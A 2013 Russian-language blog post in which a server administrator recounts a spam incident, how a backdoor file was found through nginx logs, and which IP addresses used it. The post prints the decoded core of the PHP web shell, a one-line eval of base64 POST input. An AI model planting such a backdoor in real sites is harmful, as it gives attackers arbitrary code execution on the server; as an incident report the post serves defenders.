Войти в систему

Home
    - Создать дневник
    - Написать в дневник
       - Подробный режим

LJ.Rossia.org
    - Новости сайта
    - Общие настройки
    - Sitemap
    - Оплата
    - ljr-fif

Редактировать...
    - Настройки
    - Список друзей
    - Дневник
    - Картинки
    - Пароль
    - Вид дневника

Сообщества

Настроить S2

Помощь
    - Забыли пароль?
    - FAQ
    - Тех. поддержка



Пишет Petya Kohts ([info]nit)
@ 2013-04-05 20:51:00


Previous Entry  Add to memories!  Tell a Friend!  Next Entry
Настроение:working
Музыка:Hybrid Leisureland - Division and composition
Entry tags:it, spam

cb6f82f3e4007bdaccf419abafab94c8
Очередной раз наспамили с одного из моих серверов.

Конструкция практически такая же, как в прошлый раз:
похоже (логов не сохранилось), что под пользовательским аккаунтом
через ftp залили файл следующего содержания в слегка закодированном виде
(оригинал см. по ссылке снизу):

if(isset($_POST["code"]))
{
    eval(base64_decode($_POST["code"]));
}
Далее через этот файл несколько раз послали спама
на пару десятков тысяч адресов.

Обнаружил дырку spamcop.net, который пожаловался провайдеру,
а тот уже переслал нам. Обнаружил конкретный файл путем просмотра
error_log проскирующего nginx за время, когда в очереди исходящих писем
появилось первое задержанное письмо. Нашлась такая строка:

2013/03/01 16:05:14 [error] 3713#0: *19382 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 201.182.92.138, server: www.joomla.dev.DOMAIN.ru, reques
t: "POST /.e523.php HTTP/1.1", upstream: "http://127.0.0.159:80/.e523.php", host: "www.joomla.dev.DOMAIN.ru"

Имя файла показалось подозрительным, дальше все раскрутилось легко.

Обращения к вредоносному файлу делались со следующих ip адресов:
1) 201.182.92.138 (Панама)
2) 31.184.244.18 (Объединенные Арабские Эмираты)

Материалы:
1) .e523.php
2) листинг очереди sendmail
3) примеры писем из очереди: [1], [2], [3], [4], [5]
4) access_log веб-сервера

Единственный текст, похожий на идентификатор системы,
это закомментированный текст cb6f82f3e4007bdaccf419abafab94c8
в начале программы. Что означает, непонятно. Тридцать два
шестнадцатиричных символа.